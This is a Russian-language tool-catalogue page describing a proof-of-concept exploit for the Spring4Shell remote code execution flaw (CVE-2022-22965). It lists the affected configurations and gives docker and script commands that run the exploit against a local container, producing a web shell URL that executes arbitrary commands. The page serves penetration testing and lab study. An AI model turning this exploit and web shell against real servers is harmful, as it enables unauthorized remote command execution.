Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Spring4shell-CVE-2022-22965-POC — Ещё один POC для spring4shell (Spring core RCE) | Kitploit
Инструменты/GitHubGitHub/netcode/spring4shell-cve-2022-22965-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubnetcode/spring4shell-cve-2022-22965-poc

Spring4shell-CVE-2022-22965-POC

Ещё один POC для spring4shell (Spring core RCE)

Репозиторий
3324 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимость удаленного выполнения кода Spring4shell

Эта уязвимость затрагивает Spring Core и позволяет злоумышленнику отправлять специально сформированный HTTP-запрос для обхода защитных механизмов парсера HTTP-запросов библиотеки, что приводит к удаленному выполнению кода.

Подробнее здесь

Для эксплуатации этой уязвимости должны выполняться несколько условий:

  • Использование JDK 9 или выше
  • Apache Tomcat в качестве сервлетного контейнера
  • Упаковка в виде традиционного WAR (в отличие от исполняемого jar-файла Spring Boot)
  • Использование зависимостей spring-webmvc или spring-webflux
  • Использование Spring Framework версий 5.3.0–5.3.17, 5.2.0–5.2.19 или более старых версий

POC

  • Соберите docker-образ
root@kitploit:~
docker build . -t springshell-rce-poc
  • Запустите docker-контейнер
root@kitploit:~
docker run --rm -p 8081:8080 --name springshell-rce-poc springshell-rce-poc
  • Запуск эксплойта
root@kitploit:~
python exploit-poc.py --url "http://127.0.0.1:8081/"

Ожидаемый ответ

root@kitploit:~
exploiting
Shell URL:http://127.0.0.1:8081/tomcatwar.jsp?pwd=j&cmd=whoami

Если вы перейдете по этому URL, он выполнит любую нужную вам команду cmd=<whatyouwant>

Если вы подключитесь по SSH к контейнеру, вы увидите, что был создан новый файл tomcatwar.jsp

root@kitploit:~
docker exec -it springshell-rce-poc /bin/bash
ls /usr/local/tomcat/webapps/ROOT
Скачать инструмент